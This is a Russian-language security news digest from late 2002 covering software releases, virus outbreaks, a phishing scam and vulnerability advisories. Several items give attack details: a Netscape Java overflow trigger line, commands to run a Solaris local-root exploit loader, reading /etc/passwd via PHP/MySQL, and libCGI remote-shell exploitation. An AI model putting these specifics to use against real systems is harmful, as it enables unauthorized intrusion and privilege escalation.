Solar Designer выпустил свою версию openwall-патча для недавно вышедшей версии ядра Linux 2.4.20 (патча для 2.4.19 не было). Напомним, патч openwall предназначен для дополнительной защиты ядра от различных видов локальных атак, предназначенных для повышения привилегий в системе. Включает в себя следующие компоненты безопасности: создание области невыполнимого стека памяти, ограничение линков в директории /tmp, ограничение FIFO (именованные каналы - named pipes) в /tmp, ограничение доступа к файловой системе /proc и т.д. После применения патча появляется опция "Security options" в меню конфигурации ядра. Скачать - http://openwall.com/linux/linux-2.4.20-ow0.tar.gz
2/12/2002 11:43 В России создан мощный суперкомпьютерный центр.
28 ноября 2002 года в Ханты-Мансийске в Югорском НИИ Информационных технологий состоялось открытие одного из самых мощных в России Суперкомпьютерного вычислительного центра. Производительность центра на сегодняшний день составляет более 130 млрд. операций в секунду. Ресурсы вычислительного центра позволят хранить десятки терабайт данных. Ресурсы вычислительного центра также позволят организовывать крупные веб-сайты и интернет-порталы, работающие с большими объемами данных и выдерживающие интенсивные обращения. Вычислительные ресурсы комплекса будут использоваться ЮНИИ ИТ для решения таких актуальных для Ханты-Мансийского автономного округа задач как проведение фундаментальных и прикладных исследований в области информационных технологий нефтегазового комплекса и охраны окружающей среды; параллельных компьютерных архитектур, распределенных сетевых вычислений, нейронных сетей, сверхбольших баз данных и обратных задач естествознания. Проектное решение было разработано и реализовано корпорацией ЮНИ. Основу проектного решения составили мощные суперкомпьютеры производства компании Sun Microsystems. Один из них - Sun Fire 15000 на сегодня является одним из самых мощных в мире серверов. Источник - http://www.cnews.ru
2/12/2002 09:57 Cтатья "Администрирование IPSec VPN под Linux".
На сайте SecurityLab.ru появился перевод Михаила Разумова "Администрирование IPSec VPN под Linux" (часть 1). Оригинальная статья под названием "Administering Linux IPSec Virtual Private Networks" автора Duncan Napier из Канады была опубликована в журнале для системных администраторов Sys Admin Magazine. Является продолжением изложенной ранее (ноябрь 2000 г.) статьи "Введение в FreeS/WAN и IPSec". FreeS/WAN - реализация технологии VPN (виртуальные частные сети) для организации криптозащищённого канала между подразделениями одной фирмы через открытые каналы (Интернет). Осуществляется посредством протокола IPSec, который поддерживается в IP v.4 и является протоколом по умолчанию в будущем протоколе IP v.6. Сам перевод состоит из 2-х частей. В первой описывается организация и основы расширения IP - IPSec. Вторая посвящена непосредственно описанию FreeS/WAN с кокретным разбором конфигурационных файлов. Опубликована пока только первая часть перевода, предполагается продолжение. Будет представлять несомненный интерес для системных администраторов настраивающих, либо обслуживающих VPN. Для заинтересованных - приведена ссылка на полный документ на английском языке. Перевод - http://www.SecurityLab.ru/?ID=34649 Оригинал - http://www.samag.com/documents/s=4072/sam0203c/sam0203c.htm
1/12/2002 23:54 Обновление программы: Process Killer.
Добавлены следующие функции/опции: + список dll, загружаемых процессом + менеджер потоков (остановить, заморозить, разморозить) + сортировка процессов по всем выводимым в основном окне параметрам + прозрачное окно диалога создания нового процесса Скачать новую версию можно здесь: http://www.uinc.ru/scripts/load.cgi?files/bullet/process_killer.zip
1/12/2002 18:32 Выход PostgreSQL 7.3.
PostgreSQL - достаточно "серьезная" открытая объектно-реляционная база данных (ORDBMS), входящая во многие дистрибутивы Linux. В новой версии произошли следующие изменения: PostgreSQL 7.3 теперь полностью поддерживает спецификацию SQL92, существенно упрощен возврат выборки из функций базы данных. Это делает более удобным использование хранимых процедур и упрощает перенос приложений с Oracle. Была увеличена "гранулярность" системы безопасности. Подробности - http://archives.postgresql.org/pgsql-announce/2002-11/msg00004.php
1/12/2002 18:18 Слово "Windows" должно исчезнуть из названий программ третих фирм.
Юристы компании Microsoft порекомендовали сторонним разработчикам прекратить использование слова "Windows" в названиях своих продуктов. Кое- кто подчинился. Windows Commander стал Total Commander'ом, а Windows Spy переименовался в Farsighter. Россиянин Александр Чирков, автор Windows Backup Wizard (Microsoft предложила сменить это название на "Backup Wizard for Windows(R)"), решил не обращать особого внимания на пришедшее ему письмо. "Windows не является зарегистрированной торговой маркой на территории РФ",-сказал он. Источник - http://www.linuxcenter.ru
1/12/2002 17:54 Ошибка в Mozilla 1.2.
В Mozilla-1.2 обнаружена ошибка, приводящая к неверному отображению некоторых (многих!) страниц, использующих DHTML. Она стабильно воспроизводится в Win32, но есть сообщения о ее воспроизведении и в Linux-сборке. Ошибка была внесена в 1.2 branch, ночные сборки ей не подвержены. Mozilla Team удалила сообщение о версии 1.2 со страницы релизов. Выход версия 1.2.1 планируется в начале следующей недели. Взято с www.lrn.ru. Подробности - http://bugzilla.mozilla.org/show_bug.cgi?id=182500
1/12/2002 16:53 Вышел drwebd.4.29.5-rc для OpenBSD.
Вышел первый release-candidate демона DrWeb для OpenBSD - все заинтересованные приглашаются к тестированию. Исходники - ftp://ftp.drweb.ru/pub/betas/unix/openbsd/drwebd-4.29.5-rc-openbsd.tar.gz
30/11/2002 14:37 Каждое восьмое письмо, отправленное по электронной почте, не доходит до адресата.
Согласно недавно проведенному исследованию, 11,7% отправленных email- сообщений не доходят до адресата; из них 6% ошибочно отправляются в "мусорную корзину", а 5,7% уходят "в никуда". Эта проблема вызывается некорректно работающими спам-фильтрами, применяемыми крупнейшими провайдерами интернета, такими как Eartlink, AOL, MSN, для того чтобы оградить пользователей от нежелательной электронной почты. Спам-фильтры - вынужденная мера против нежелательной рассылки, которая составляет до 50% всех почтовых сообщений. Исследование было проведено Джорджем Билбри, исполнительным директором компании Assurance Systems. Эта фирма предлагает довольно необычную услугу - контроль за доставкой email-сообщений. Билбри использовал простой метод. Он получил несколько почтовых аккаунтов у крупнейших провайдеров, подписался на рассылку новостей и в течение трех месяцев проверял почтовый ящик. Каждое восьмое сообщение оказалось утерянным. Источник - http://www.infoforld.com/
30/11/2002 14:29 Linux опередила Windows по количеству дыр.
Компания Aberdeen Group, специализирующаяся на консультационных услугах в сфере компьютерной безопасности, опубликовала весьма интересный отчет о безопасности различных компьютерных платформ. В нем, в частности, указывается, что пальма первенства по количеству дыр и уязвимостей в программных продуктах постепенно переходит от корпорации Microsoft к разработчикам ПО с открытым исходным кодом. На такие выводы аналитиков Aberdeen Group натолкнуло изучение рекомендаций организации CERT (Computer Emergency Response Team) за последние пару лет. Как оказалось, наибольшее количество сообщений об уязвимостях в Windows пришлось на 2001 г. В то же время, за первые десять месяцев года нынешнего более половины (точнее, 16 из 29) предупреждений CERT касались Linux. Количество сообщений CERT о троянских программах для Windows снизилось с шести до нуля. В случае с Linux число троянов немного увеличилось: за первые десять месяцев 2002 г. были выпущены два предупреждения CERT против одного за весь 2001 г. Кроме того, постепенно растет число предупреждений о дырах в программных продуктах для других вариантов UNIX, включая MacOS X, внутреннего ПО сетевого оборудования и систем защиты информации. В Aberdeen Group выражают сомнение в том, что разработчики ПО с открытым кодом действительно быстрее и эффективнее устраняют дыры в своих продуктах. Например, в случае с Linux борьбу с дырами усложняет наличие большого числа дистрибутивов, для каждого из которых часто требуются собственные заплатки. В открытых продуктах редко встречаются системы автоматического обновления, ставшие уже привычными для продуктов той же Microsoft и позволяющие оперативно и в автоматическом режиме ликвидировать уязвимые места в программном обеспечении. Все это значительно осложняет борьбу с дырами в Linux и других UNIX-подобных системах. Подробности - http://www.compulenta.ru/2002/11/29/35903/
30/11/2002 14:04 Выход Linux 2.2.23.
Вслед за своими колегами по сообществу Linux Алан Кокс выпустил очередную версию ядра ветви 2.2. Фактически является версией 2.2.23-rc2 (релиз кандидат), в которой был устранён возможный DoS в Backport NT iret - автор патча Marc-Christian Petersen. Более подробно - http://linuxtoday.com/news_story.php3?ltsn=2002-11-29-003-26-NW-KN
30/11/2002 12:14 Ревнивого студента посадили за изощренную виртуальную месть.
На прошлой неделе в Великобритании 21-летний студент Филип Нурс (Philip Nourse) был приговорен к пятимесячному тюремному заключению за виртуальную месть своей неверной 19-летней подруге. В деле фигурировало хакерство и сговор с сотрудниками сотового оператора mmO2, предоставившими ревнивцу доступ к базе SMS- сообщений. О факте измены студент узнал после того, как, подговорив своих друзей, работавших на сотового оператора mmO2, передать ему базу данных ее SMS. Студент взломал аккаунт онлайновой службы знакомств Friends Reunited и заменил в анкете подруги данные о ней и фотографию на порнографическую. Кроме того, взломал ее электронный почтовый ящик и переслал ее друзьям интимные фотографии. В итоге студент скомпрометировал систему безопасности оператора, и руководству mmO2 пришлось оправдываться, что база не была взломана, и инцидент вряд ли повторится с кем-нибудь еще. Друзья ревнивого студента лишились работы и были осуждены в соответствии с Актом о защите данных. Аналитики Gartner поспешили заявить о ненадежности SMS в принципе, поскольку их содержимое известно персоналу компании-оператора. По их мнению, SMS вообще не непригодны для передачи конфиденциальных сообщений. Однако при этом большинство пользователей не осознают, насколько легко их SMS-переписку можно перехватить. Источник - http://www.cnews.ru
30/11/2002 11:51 Новый компьютерный вирус Winevar-A еще и обзывается.
На днях в сети появился новый вирус Winevar-A, рассылающий себя в виде вложения по электронной почте, сообщает антивирусная компания Sophos. В отличие от множества своих однотипных собратьев, этот обладает вредоносными функциями - удаляет файлы, пытается "затопить" сайт антивирусной фирмы Symantec повторяющимися обращениями к главной странице через HTTP, содержит в себе вирус W32/Flcss и "червя", рассылающего все это через почтовый сервер (SMTP) всем, кто был замечен в адресной книге пользователя. И, самое необычное, - оскорбляет пользователя. При перезагрузке Windows на экране появляется окошко с надписью по-английски: "Что за глупость ты сделал!". После нажатия кнопки "Ok" на окошке, пользователь недосчитывается на диске всех файлов, которые можно было удалить стандартными функциями (все, кроме занятых системой). Поскольку вирус не умеет запускаться самостоятельно после открытия письма - это обычное исполняемое вложение - оскорбление выглядит скорее как констатация факта, поскольку уже не первый год все антивирусные фирмы призывают пользователей не запускать неизвестных вложений. Sophos заявляет также, что вирус пока не представляет серьезной опасности из-за малой скорости распространения, а теперь - и из-за появления его сигнатуры в антивирусных базах данных. Источник - http://www.sophos.com/
30/11/2002 11:28 Panda Software сообщает о появлении нового варианта вируса CIH.
Вирусная лаборатория компании Panda Software сообщает о появлении CIH.1106 (W32/CIH.1106), вируса, который уничтожает содержимое жесткого диска и препятствует загрузке зараженного компьютера. Для того, чтобы осуществить заражение, CIH.1106 проникает в резидентную часть системы. На компьютерах с ОС Windows 98, Windows 95 или Millennium для того, чтобы запуститься, вирус ищет файлы с расширением EXE и записывает свой код в неиспользуемые части этих файлов. Таким образом, размер зараженных файлов не увеличивается, и у пользователя не возникает подозрений. На компьютерах с ОС Windows 2000, NT или XP червь размещается в памяти системы резидентно и не инфицирует файлы. Будучи единожды активирован, CIH.1106 выполняет следующие действия второго числа каждого месяца: вирус переписывает заново таблицу размещения файлов (FAT) на жестком диске, уничтожая тем самым его содержимое, уничтожает содержание памяти BIOS на компьютерах с материнской платой, выполненной на чипсете Intel 430TX, в результате чего компьютеры не работают и даже не загружаются. CIH.1106 распространяется различными способами: в электронных письмах с зараженными документами, по компьютерным сетям, через CD-ROMы, флоппи-диски, FTP, интернет-загрузки и проч. CIH.1106 является разновидностью вируса W95/CIH, также известного как CIH. Первое появление CIH зафиксировано в 1998 г. Это один из наиболее деструктивных вирусов, которые когда-либо были написаны. После активации он уничтожает содержимое жесткого диска и переписывает FLASH BIOS в материнских платах. По данным последнего расследования, его автором является двадцатичетырехлетний тайваньский студент Chen Ing-Halu (по инициалам своего имени он и назвал вирус). Существует множество разновидностей CIH, наиболее разрушительным и широко распространенным среди них является "Чернобыль" ("Chernobyl"). Подробности - http://www.viruslab.ru/
30/11/2002 10:34 Краха украинского интернета не будет.
4 ноября 2002 года вступили в действие новые правила домена com.ua. Согласно им все домены, которые не были перерегистрированы, перестали работать, - их пользователи уже не получают электронную почту, сайты не работают, горе-владельцы теряют своих потенциальных клиентов и собственно деньги. Одним словом, катастрофа национального масштаба. Так ли это на самом деле? Неформально домен UA поддерживался при маршрутизации почты в АО "Релком" по крайней мере с конца 1990 года. Украина в построении своего домена пошла по пути таких развитых стран, как Великобритания, Канада, Япония, - доменное пространство было разбито на ряд публичных (com.ua, net.ua, org.ua, gov.ua) общего назначения и географических поддоменов (kiev.ua, odessa.ua). Aдминистраторы домена UA на начальном этапе строительства национального домена старались избежать большой "плоской" зоны, содержащей записи о компьютерах по всей стране. Такие зоны сложны в администрировании. Кроме того, большая плоская зона не позволяет поделить ответственность/нагрузку между администраторами DNS, что при общественном характере этой нагрузки было бы просто не честно. Более подробно - http://www.cnews.ru/news/ebusiness/2002/11/29/20021129192522.shtml
29/11/2002 13:33 Выход Linux 2.5.50.
В то же самое время Линус Торвальдс объявил о выходе 50-й(!) версии девелоперского ядра Linux. Обновились ACPI, USB, LSM, SCSI. Также обновлены версии для архитектур Sparc, ARM и v850. Полный Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.50
29/11/2002 12:49 Выход Linux 2.4.20.
Marcelo Tosatti выпустил очередную версию текущей стабильной ветки Linux kernel - 2.4.20. Изменения по сравнению с 2.4.20 довольно значительны. Первоначальный план по выпуску 2.4.20 как bugfix-only release выполнен не был. Изменения: Добавлена новая файловая система - JFS, значительные апдейты архитектуры SPARC32/SPARC64, LVM доведен до версии 1.0.5, исправления в NFS, NFS over TCP, исправления для большей совместимости с gcc3, багфиксы в netfilter, апдейт USB подсистемы, код для распознавания stack overflow в кернеле (не security фича) на x86, VM апдейты на основе -aa патчей, исправления в reiserfs, новый блок аллокатор в reiserfs, апдейты и багфиксы в ext3, апдейт архитектуры PPC32, апдейт архитектуры MIPS/MIPS64, IEEE1394 updates, апдейты драйверов. Так же security багфиксы включая DoS с неправильной отработкой Trace флага на входе в lcall 7, lcall 27 совместимые гейты. Автор текста новости - green с linux.org.ru. Changelog - http://linuxhacker.ru/linuxnews/2.4.20.txt
29/11/2002 12:25 Британия задыхается от спама.
Каждое восьмое электронное письмо в Великобритании — мусор. Но это не предел: в США уровень спама вдвое выше. По оценкам компании MessageLabs, опубликовавшей свежий отчет, в 2002 году британские пользователи e-mail наблюдают значительный рост количества непрошеных писем, забивающих почтовые ящики. Сейчас каждое восьмое письмо, получаемое жителями страны, содержит спам — в январе таких писем было всего одно на 199. Судя же по тенденции, наблюдаемой в США, дальше будет еще хуже: за океаном каждое третье письмо несет в себе непрошеную рекламу. «Два-три квартала назад спам еще считали мелкой неприятностью или неудобством, теперь же люди начинают понимать, что это серьезная проблема, мешающая работать», — говорит главный инженер MessageLabs Марк Саннер (Mark Sunner). По его словам, методы, которыми спамеры обходят защитные фильтры, тоже постоянно совершенствуются: в частности, появился полиморфический спам, несколько меняющий форму, чтобы обманывать статические фильтры. «Идет гонка вооружений между распространителями спама и производителями систем защиты», — говорит Саннер. Подробности - http://zdnet.ru/?ID=292168
29/11/2002 11:42 ISC предлагает всем делать финансовые взносы для поддержки безопасности системы доменных имен.
ISC (Internet Software Consortium, "Консорциум по разработке ПО для интернета") создал общество BIND Forum, которое должно помочь в устранении многочисленных дыр в программе BIND, преобразующей доменные имена в IP-адреса. Помошь участников общества будет заключаться в том, что собранные членские взносы пойдут на оплату труда программистов по усовершенствованию программы, а затем и по периодическому устранению новых дыр, количество которых будет все меньше и меньше, но, как показывает история развития ПО, никогда не дойдет до нуля. Программа BIND (Berkeley Internet Name Domain) традиционно была бесплатной, а в ISC из девяти членов только один на полной ставке занимался ее улучшением. Консорциум решил, что нужно передать это дело какой-нибудь серьезной фирме. В BIND Forum вошли такие гиганты рынка, как Compaq, Ericsson, HP, IBM, VeriSign и Sun. Они готовы платить членские взносы, которые можно назвать символическими. Источник - http://www.computerwire.info/
29/11/2002 11:09 Хакеры из ХАМАС объявили Израилю "электронный джихад".
Палестинская террористическая организация ХАМАС готовит хакерские атаки на еврейские сайты, сообщает Ha'aretz daily. Сотрудник Центра Симона Визенталя (Simon Wiesenthal Center) случайно наткнулся в сети на два арабских вебсайта, которые объявили о начале "электронного джихада". На этих сайтах не только содержались призывы взламывать еврейские сайты, но и рассказывалось, как это надо делать. По крайней мере, один из них, по данным центра, принадлежит группировке ХАМАС. Атаки запланированы на 29 ноября. Конкретные цели не указаны, но, как заявил представитель центра, ими могут стать любые сайты, имеющие отношение к Израилю - начиная от правительственных, и кончая страницами иностранных компаний, торгующих с этой страной. "Мы не знаем насколько сильной будет активность хакеров, а также как именно они будут действовать, но предполагаем, что это очень важно", - заявил он. Источник - http://www.securitylab.ru
28/11/2002 15:35 "Корейский" червь набирает обороты.
"Лаборатория Касперского" предупреждает пользователей о регистрации случаев заражения компьютеров новым сетевым червем "Winevar" (также известен как "Корейский червь"). Данная вредоносная программа была обнаружена на прошлой неделе и своевременно внесена в базу данных Антивируса Касперского. Однако реальные инциденты, вызванные этим червем были зафиксированы только сегодня: сейчас антивирусные специалисты "Лаборатории Касперского" уже получили сведения о заражениях "Winevar" из Южной Кореи, России и стран Прибалтики. "Winevar" распространяется по электронной почте. Зараженные письма могут иметь различные заголовки, текст и имена вложенных файлов. При доставке в почтовый ящик потенциальной жертвы червь пытается незаметно проникнуть на компьютер, используя для этого следующие бреши в системе безопасности Internet Explorer: Microsoft VM ActiveX Component,IFRAME Vulnerability. Это обстоятельство делает возможным заражение компьютера непосредственно в момент чтения письма. После внедрения в систему он модифицирует загрузочные файлы Windows для активизации при перезагрузке операционной системы и инициирует процедуру распространения. Для этого он сканирует все найденные на компьютере файлы формата .HTM и .DBX и извлекает из них адреса электронной почты. На эти адреса червь отсылает копии "Winevar", используя для этого прямое подключение к почтовому (SMTP) серверу. "Winevar" имеет ряд исключительно опасных проявлений, вследствие которых владельцы зараженных компьютеров могут безвозвратно потерять все данные. Во-первых, червь и уничтожает в памяти и на дисках антивирусные программы, программы-отладчики и межсетевые экраны. В некоторых случаях "Winevar" также удаляет на компьютере все остальные файлы. Во-вторых, червь заражает компьютер вирусом "Win32.Funlove". В-третьих, "Winevar" реализует DoS-атаку на Web-сайт компании Symantec, запуская бесконечный цикл обращений нему. Подробности - http://www.kaspersky.ru/news.html?id=1104183
28/11/2002 15:16 Грустная история про пользователей eBay.
На минувшей неделе пользователи известного аукциона eBay стали жертвами мошенников. Для обмана честных граждан злоумышленники использовали фиктивный сайт change-eBay.com. На почтовые ящики около тысячи пользователей eBay от лица администрации аукциона были разосланы сообщения с просьбой подтвердить имя пользователя и пароль для восстановления базы данных. Подобное желание со стороны администрации eBay мотивировались некой якобы произошедшей технической ошибкой, которая повлекла за собой потерю информации. Дабы устранить возникшие трудности, пользователям настойчиво рекомендовалось сходить на сайт change-eBay.com и оставить там персональные данные, в том числе и номера кредитных карточек. Однако, как известно, сайтом известного аукциона является ebay.com, а не change-eBay.com, куда гражданам предлагалось пойти, потому как сайт change-eBay.com не имел ровным счетом никакого отношения к знаменитому eBay, а был специально создан для обмана этих самых честных граждан и зарегистрирован мошенниками на имя владельца украденной ими кредитной карточки. Источник - http://www.viruslist.com
28/11/2002 14:44 Вышла новая версия системы защиты информации StrongDisk Pro.
Компания "Физтех-софт" объявила о выходе третьей версии системы защиты конфиденциальной информации StrongDisk Pro, которая является составляющей линейки средств защиты информации, представляемой компанией. Основное предназначение StrongDisk Pro - обеспечение полной безопасности при работе и хранение конфиденциальной информации, с которой работает индивидуальный пользователь (задачу защиты при многопользовательском режиме решает StrongDisk Server). StrongDisk Pro создает в операционной системе закодированные логические диски. При записи на них информация кодируется "на лету", а при чтении декодируется. Чтобы декодировать информацию с такого диска, необходимо иметь несколько независимых компонент для аутентификации: пароль, электронный ключ, файл-ключ, а так же знать ПИН для электронного ключа. При этом может требоваться как одна компонента, так и все четыре, то есть может быть обеспечена 4-факторная защита. Кроме того, при помощи StrongDisk Pro можно скрыть сам факт наличия на компьютере конфиденциальной информации, а также мгновенно закрыть доступ к информации по нажатию "горячей клавиши" или при извлечении электронного ключа. Более подробно - http://www.cnews.ru/
28/11/2002 14:13 Выход Mozilla 1.2.
На сайте mozilla.org объявлено о выходе версии 1.2 (после альфы и беты). Из улучшений: улучшена поддержка CSS и XML, по отзывам испытавших работает пошустрее и меньше падает, реализована новая функция поиска на странице, косметические изменения в преференсах, включена поддержка gtk, можно укаызвать несколько начальных страниц и др. Подробности - http://www.mozilla.org/releases/mozilla1.2/
28/11/2002 13:43 Множественные уязвимости в Sybase.
Application Security, Inc. выпустила 3 бюллетеня по безопасности, описывающие уязвимости в Sybase Adaptive Server - ПО сервера для управления БД Sybase. Обнаружены уязвимости в следующих компонентах: расширенной процедуре накопления ( ESP - extended stored procedure) xp_freedll (предназначена для освобождения библиотеки DLL для работы её с другой процедурой), встроенной функции сервера DROP DATABASE (предназначена для удаления БД с сервера), встроенной функции сервера DBCC CHECKVERIFY (предназначена для проверки результатов запуска другой функции DBCC CHECKSTORAGE). Все эти уязвимости приводят к возможности переполнения буфера с последующей перезаписью стека и запуском команд в контексте привилегированного пользователя (повышение полномочий локальных пользователей). Были обнаружены в Sybase Adaptive Server 12.0 и 12.5. В зависимости от применяемой версии рекомендуется применить патчи - 12.5.0.2 и 12.0.0.6 ESD#1, выпущенные в начале ноября. Для проверки уязвимости также рекомендуется загрузить AppDetective, доступный на сайте производителя - http://www.sybasesecurity.net/products/appdetective/sybase/. Подробности - http://www.appsecinc.com/resources/alerts/sybase/
28/11/2002 12:54 Уязвимость в libCGI.
Продолжая азиатскую тему, отметим бюллетень, выпущенный "dong-houn yoU" (Xpl017Elz) из INetCop(c) Security с внутренним кодом #2002-0x82-007. В бюллетене описывается уязвимость в libCGI - библиотеке, написанной на С для С-программистов или программистов, имеющих навыки С-программирования, для разработки CGI-приложений на языке С. Уязвимость была обнаружена в файле Include/libcgi.h - при вызове функции void changevalue(char mt[],char *pt) происходит некорректная проверка буфера. В результате переполнения буфера происходит перезапись указателя фрейма и возникает возможность получения удалённого шелла (правда, с правами nobody). Автором написан эксплоит, применяя который совместно с ncat можно достигнуть "необходимых" результатов (правда, сначало необходимо ещё найти адрес шеллкода). Уязвимость была обнаружена в версии libCGI 0.1 всех ОС. Автором также выпущен необходимый патч. Более подробно - http://x82.inetcop.org/h0me/adv1sor1es/libCGIbug.txt
28/11/2002 12:09 Локальная уязвимость в Solaris.
Очередной азиатский программист (на этот раз из Китая) CatDog из University of Science and Technology of China обнаружил локальную уязвимость в ОС Solaris, позволяющую получить процессу пользователя получить полномочия суперпользователя (uid=0). Уязвимость присутствует в системном вызове priocntl(2), являющемся планировщиком управления процессами (process scheduler control). При вызове priocntl() pc_clname структуры pcinfo_t указывает на строку определяющую модуль, необходимый для загрузки. При этом полномочия при вызове модуля через priocntl() не проверяются. Кроме того, также системный вызов priocntl() не проверяет путь, на который ссылается загружаемый модуль. Всё вышесказанное позволяет загрузить свой модуль с привилегиями суперпользователя. Автором написаны 2 программы. Одна (flkm.c) представляет собой загружаемый модуль, вторая(final.c) представляет собой загрузчик модуля. Для запуска необходимо выполнить ./final, либо ./final 64 в завивимости от используемой платформы, узнать которую можно, выдав команду isainfo -b. Необходимо отметить, что Casper Dik из фирмы Sun опубликовал предварительный патч, основанный на том, что аргумент pc_clname[] ограничен размером. Подробности - http://www.catdogsoft.com/S8EXP/
28/11/2002 11:31 Возможность доступа к системым файлам через MySQL.
Наш вьетнамский коллега Hai Nam Luke из HVA (Hackers Vietnam Associated) написал на PHP эксплоит, позволяющий локально получить доступ к важным системным файлам (/etc/passwd, /proc etc.) на сервере с установленной связкой PHP и MySQL. Подобная уязвимость может быть очень критична на сврбодно доступных Веб-серверах (например, http://members.lycos.co.uk/), позволяющих своим пользователям держать PHP-скрипты на виртуальных домашних страницах, поскольку, помимо доступа к критичным системным файлам позволяет получить информацию о других пользователях. Эксплоит - http://www.security.nnov.ru/search/document.asp?docid=3813
28/11/2002 10:44 Помощники для Microsoft Outlook.
Компания "Твик Маркетинг" представила новые программные продукты на русском рынке - плагины для Microsoft Outlook. Плагин Subscription Manager позволит управлять процессом подписки-отписки на списки рассылки, ведущиеся при помощи Microsoft Outlook. Плагин дает возможность организовать свой собственный список рассылки, на который пользователи могут подписываться самостоятельно, посылая запрос по электронной почте. Плагин Contacts Verifier предназначен для слежения за актуальностью адресов электронной почты в контактах. Программа быстро может проверить всю адресную книгу и указать на контакты, содержащие уже несуществующие адреса электронной почты. Плагин Duplicate Email Remover найдет и обработает дублирующиеся почтовых сообщений в папках Microsoft Outlook. Плагин Save Mailing List создан для экспорта контактов и групп пользователей из адресной книги Microsoft Outlook в списки рассылки пользователя. Источник - http://www.massmail.ru/
27/11/2002 14:12 Уязвимость в реализации Java в Netscape.
Jouko Pynnonen из Oy Online Solutions Ltd. (Финляндия) обнаружил уязвимость в реализации Java в 4-й версии броузера Netscape. В результате эксплуатации уязвимости произвольный код может быть выполнен на машине пользователя, обратившегося к Web-странице, содержащей специально сконструированный Java-апплет. Переполнение можно получить при вызове метода canConvert() класса sun.awt.windows.WDefaultFontCharset. При передаче длинной строки конструктору класса можно затем вызвать метод canConvert() с передачей управления выполнимому коду. Автор в качестве примера приводит следующую конструкцию: new WDefaultFontCharset(long_string).canConvert('x'); Как утверждается данная уязвимость типична только для 4-й версии Netscape и на Windows-платформе, что делает её узкоприменимой. В других броузерах, а также в более поздних версиях Netscape c Java плагином от Sun уязвимости нет. В качестве рекомендации пользователям Netscape 4 советуют отключить поддержку Java. Источник - http://www.securityfocus.com
27/11/2002 13:19 Взлом паролей ОС OpenVMS при помощи John the Ripper.
Jean-loup Gailly написал патч, позволяющий при помощи популярного взломщика John the Ripper (http://www.openwall.com/john/), созданного Solar Designer-ом, подбирать пароли для операционной системы OpenVMS (платформы Vax и Alpha). Написан на ассемблере, но имеет версию исходников для портирования на С. Как пишет автор, подбирать пароли для OpenVMS, поскольку в этой системе не делается различия между строчными и пропичсными буквами и используются только комбинации букв, цифр и символов '$', '_'. Подробности - http://gailly.net/security/john-VMS-readme.html
27/11/2002 12:43 Уязвимости в ОС Hewlett-Packard.
Hewlett-Packard совместно с Compaq Computer Corporation выпущены 3 бюллетеня по безопасности, в которых описываются уязвимости в ОС HP Tru64 UNIX и HP-UX. Первая уязвимость обнаружена в модуле LDAP (Lightweight Directory Access Protocol) для аутентификации в системе OSIS (Open Source Internet Solutions), переименованной в последних версиях HP Tru64 UNIX в Internet Express. Обнаружено, что используя эту уязвимость, непривилегированный пользователь может получить доступ к важным системным файлам и процессам. Соответствующий бюллетень имеет код SSRT2385. Второй бюллетень с кодом SSRT2301 описывает уязвимость обнаружена в утилите uudecode, выставляющую неверные полномочия на используемые файлы. В последнем бюллетене описывается обнаруженная уязвимость в протоколе IGMP (Internet Group Management Protocol), использование которой может привести к отказу сервиса сетевой поддержки (DoS). Код бюллетеня - SSRT2266. Две первые уязвимости затрагивают только ОС HP Tru64 UNIX, третья присутствует также в ОС HP-UX. В HP-MPE/ix и OpenVMS ошибки не обнаружены. Для устранения ошибок рекомендуется применить соответствующие патчи, носящие названия в терминологии Hewlett-Packard и Compaq ERP (Early Release Patches). Подробности - http://thenew.hp.com/country/us/eng/support.html
27/11/2002 11:45 OWASP CodeSeeker.
Проект OWASP (Open Web Application Security Project) анонсировал ожидающийся в декабре этого года выпуск бета-версии 1.0 приложения CodeSeeker - файрволл и систему обнаружения атак, работающую на уровне приложений (дословно - Application Level Firewall and Intrusion Detection System). Приложение будет работать в средах Linux, Win32 и Solaris. Разработчик, фирма Butterfly Security предоставила исходные коды проекту OWASP в качестве дара 19 ноября этого года и будет в дальнейшем заниматься поддержкой и обновлением ПО. Распространяется на условиях GPL в исходных кодах и бесплатно, написан на Java и C/C++. Работа приложения основана на перехвате HTTP-траффика (сразу после декодирования SSL) и дальнейшем анализе поступившего запроса для определения его легитимности. Последующие действия зависят от настроек Code Seeker - если он сконфигурирован как IDS, выводятся просто сообщения на консоль, в случае же конфигурирования как файрволла производится активное блокирование "подозрительного" траффика. Сайт проекта - http://www.owasp.org/codeseeker/
27/11/2002 11:10 Sun представила предварительную версию ОС Solaris 9 для процессоров x86.
На этой неделе компаниz Sun Microsystems объявила о выпуске предварительной версии операционной системы Solaris 9 для компьютеров на процессорах x86. ОС, получившую название Solaris 9 Early Access, можно скачать, зарегистрировавшись в Sun и заплатив 20 долл. США. Полная версия Solaris 9 для процессоров x86 поступит в продажу в декабре этого года. Цена на ОС в варианте для однопроцессорных систем будет установлена на уровне 99 долларов США. Интересно, что в начале этого года Sun сообщила об отказе от разработки Solaris для процессоров x86 (прежде всего, это чипы компании Intel), однако в октябре компания внезапно передумала и объявила, что Solaris 9 x86 все же увидит свет. В будущем компания намерена обеспечить синхронный выход операционных систем для собственных процессоров SPARC и чипов с архитектурой x86. Системные требования: процессор x86 (32-битная платформа), 600 МБ или 1ГБ дискового пространства (десктоповая или серверная версия), 64 МБ RAM. Подробности - http://wwws.sun.com/software/solaris/intel/
27/11/2002 10:48 Очередной баг в AIM.
"Dave B." (bzerob@bellatlantic.net) из Infested Nexus обнаружил баг в AIM (AOL Instant Massenger), позволяющий удалённо загружать произвольные файлы на удалённый компьютер другого пользователя AIM без согласия последнего. Это может быть выполнено посредством опции 'get file' в AIM и выставленном флаг, позволяющем другим загружать файлы без согласия пользователя. Для применения описанного метода необходимо переименовать требуемый для пересылки файл в USERX.lst и нажать "send file". Файл будет немедленно передан на другой USERX-компьютер, однако при этом появится окно загрузки файла. Честно говоря, ситуация довольно надуманна, но имеет место быть. Как пишет сам автор, таким образом можно передать файл на компьютер отошедшего куда-то пользователя. Проверялось на AIM 5.0.2938. Хммм... судя по описанию достаточно просто перкрыть эту "особенность", запретив загрузку файлов без разрешения, что, наверное тяжело простым американским домохозяйкам, являющимся пользователями America On Line. :) Источник - http://www.securityfocus.com
27/11/2002 10:31 Новая атака на DNS сервера.
